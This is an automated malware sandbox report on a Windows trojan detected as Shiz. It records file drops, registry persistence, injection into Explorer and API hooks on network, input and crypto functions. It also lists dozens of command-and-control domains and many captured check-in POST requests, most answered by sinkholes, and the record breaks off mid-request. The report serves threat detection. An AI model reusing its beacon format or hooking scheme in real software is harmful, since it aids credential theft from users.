MD5: 2691b3ba044ebaa82b18b8bef51b5705
SHA1: 77fb08ba6e496594b5176853682c43f5cd752e40
SHA256: 631d49f9e59d3a2220edda45d8f7bf1210f7e41a4e89e754a2920bdb3051c9d1
SSDeep: 6144:msBFm fWQX6VpYlaC0H2FLaOyaeYeflemO r4RmdT3hl/FTYSkN1:FrfWVWlngwLaFaZef1r4RYRl/Nj
Size: 279552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1999-05-12 16:25:46
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:556

The Trojan injects its code into the following process(es):

Explorer.EXE:532

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\AppPatch\vkyeif.exe (1983 bytes)
%System%\config\software (2132 bytes)
%System%\config\SOFTWARE.LOG (4003 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)

Registry activity

The process %original file name%.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 7C 51 7F FE 80 59 3E 3E A6 CC 5E 62 8B E7 28"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\vkyeif.exe_, \??\%WinDir%\apppatch\vkyeif.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöTòj6º¤oD¬<»¹œ³ŒQ\´òd¼Œ¤Kô1,Å $ë›ÛÌ«”¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’
#»Û:ÑU„„ԝ\±ª²Dƒuœ¡Ü¼);¼\ƒtµ2”kDù”a”*›cü$}Sô|ë$¤ô{¬q³#sÅå\yuJÛËu©|ù
¢rKã!$’‹‹b±ÃÄ£ãÍ‚“ÉUcdÁÄZ¡r»ô”)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*â„¢ü›ÙóÍÁ=éÔÑщ¬
q9|áíù’‘íÁ©šÄR"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle

The Trojan installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

VersionInfo

Company Name: Unistylist
Product Name: wasteword
Product Version: 2.9.3.7
Legal Copyright: molinia
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.9.5.1
File Description: lowan
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
68d8bfe848092a071135009607227f63
864a44f75a75096c4f24124dbbaf7014

URLs

URL	IP
hxxp://digivehusyd.eu/login.php	69.195.129.70
hxxp://kemocujufys.eu/login.php
hxxp://xuxusujenes.eu/login.php	208.100.26.234
hxxp://keraborigin.eu/login.php	95.211.174.92
hxxp://qekenilacap.eu/login.php
hxxp://lysovidacyx.eu/login.php	23.253.126.58
hxxp://tufecagemyl.eu/login.php	23.253.126.58
hxxp://norumikemem.eu/login.php	23.253.126.58
hxxp://lykemujebeq.eu/login.php	23.253.126.58
hxxp://foxivusozuc.eu/login.php	23.253.126.58
hxxp://vocakemenir.eu/login.php	23.253.126.58
hxxp://ryqecolijet.eu/login.php	23.253.126.58
hxxp://xuqohyxeqak.eu/login.php	23.253.126.58
hxxp://kefuwidijyp.eu/login.php	23.253.126.58
hxxp://puvybivihox.eu/login.php	23.253.126.58
hxxp://jeluganusog.eu/login.php	23.253.126.58
hxxp://lyvejujolec.eu/login.php	23.253.126.58
hxxp://nozulufynax.eu/login.php	23.253.126.58
hxxp://cihunemyror.eu/login.php	23.253.126.58
hxxp://vofozymufok.eu/login.php	23.253.126.58
hxxp://ryleryqacic.eu/login.php	23.253.126.58
hxxp://nopegymozow.eu/login.php	23.253.126.58
hxxp://rynazuqihoj.eu/login.php	23.253.126.58
hxxp://xugiqonenuz.eu/login.php	69.195.129.70
hxxp://pupujeguper.eu/login.php	23.253.126.58
hxxp://fodakyhijyv.eu/login.php	23.253.126.58
hxxp://ciliqikytec.eu/login.php	23.253.126.58
hxxp://kevedorozup.eu/login.php	23.253.126.58
hxxp://dimutobihom.eu/login.php	23.253.126.58
hxxp://mamixikusah.eu/login.php	23.253.126.58
hxxp://jewuqyjywyv.eu/login.php	23.253.126.58
hxxp://qekikyvutic.eu/login.php	23.253.126.58
hxxp://tucyguqaciq.eu/login.php	23.253.126.58
hxxp://jefapexytar.eu/login.php	23.253.126.58
hxxp://qeqinuqypoq.eu/login.php	23.253.126.58
hxxp://xuqufyduras.eu/login.php	23.253.126.58
hxxp://puregivytoh.eu/login.php	23.253.126.58
hxxp://galokusemus.eu/login.php	23.253.126.58
hxxp://gadufiwabim.eu/login.php	23.253.126.58
hxxp://qetuluvolos.eu/login.php	23.253.126.58
hxxp://ganycyhywek.eu/login.php	23.253.126.58
hxxp://qebahilojam.eu/login.php	23.253.126.58
hxxp://ryhuzilywax.eu/login.php	23.253.126.58
hxxp://fokyxazolar.eu/login.php	23.253.126.58
hxxp://qexofyqihid.eu/login.php	23.253.126.58
hxxp://lyruxyxaxaw.eu/login.php	23.253.126.58
hxxp://xukovoruput.eu/login.php	23.253.126.58
hxxp://nojejecebuw.eu/login.php	23.253.126.58
hxxp://marytymenok.eu/login.php	23.253.126.58
hxxp://gatedyhavyd.eu/login.php	23.253.126.58
www.bing.com	204.79.197.200

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.

Traffic

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kefuwidijyp.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryqecolijet.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryhuzilywax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:57 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: foxivusozuc.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qetuluvolos.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:58 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mamixikusah.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:50 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mamixikusah.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:50 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nozulufynax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:11 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fodakyhijyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvejujolec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: digivehusyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Connection: close

Set-Cookie: jsessionid=e6e6275c4b3ed34f5a86d53b80e7c8a3; Expires=Fri, 01 Sep 2023 17:41:33 GMT

Date: Fri, 02 Sep 2016 17:41:33 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynazuqihoj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:37 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pupujeguper.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:50 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xukovoruput.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:53 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qebahilojam.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:48 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysovidacyx.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: keraborigin.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 02 Sep 2016 17:41:37 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Server: sinkhole
51..sinkhole-01.sinkhole.tech - where the bots party hard and the rese
archers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 02 Sep 
2016 17:41:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked
..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.t
ech - where the bots party hard and the researchers harder...0..HTTP/1
.1 200 OK..Server: nginx..Date: Fri, 02 Sep 2016 17:41:37 GMT..Content
-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..
Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party
 hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..
Date: Fri, 02 Sep 2016 17:41:37 GMT..Content-Type: text/html..Transfer
-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sink
hole-01.sinkhole.tech - where the bots party hard and the researchers 
harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 02 Sep 2016 17:
41:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connec
tion: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - wh
ere the bots party hard and the researchers harder...0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kemocujufys.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fokyxazolar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vofozymufok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qeqinuqypoq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekikyvutic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:09 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatedyhavyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xukovoruput.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:50 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykemujebeq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tufecagemyl.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqohyxeqak.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fokyxazolar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nopegymozow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:39 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocakemenir.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysovidacyx.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:38 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kevedorozup.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: dimutobihom.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tucyguqaciq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyruxyxaxaw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jeluganusog.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:53 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galokusemus.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jeluganusog.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:49 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tucyguqaciq.eu

Content-Length: 9

